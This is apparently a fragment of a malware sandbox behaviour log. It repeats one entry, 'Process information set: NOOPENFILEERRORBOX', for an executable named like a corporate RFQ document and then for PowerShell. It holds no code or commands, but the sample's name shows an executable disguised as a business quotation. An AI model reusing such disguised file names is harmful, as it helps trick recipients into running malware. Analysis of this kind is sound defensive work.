                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
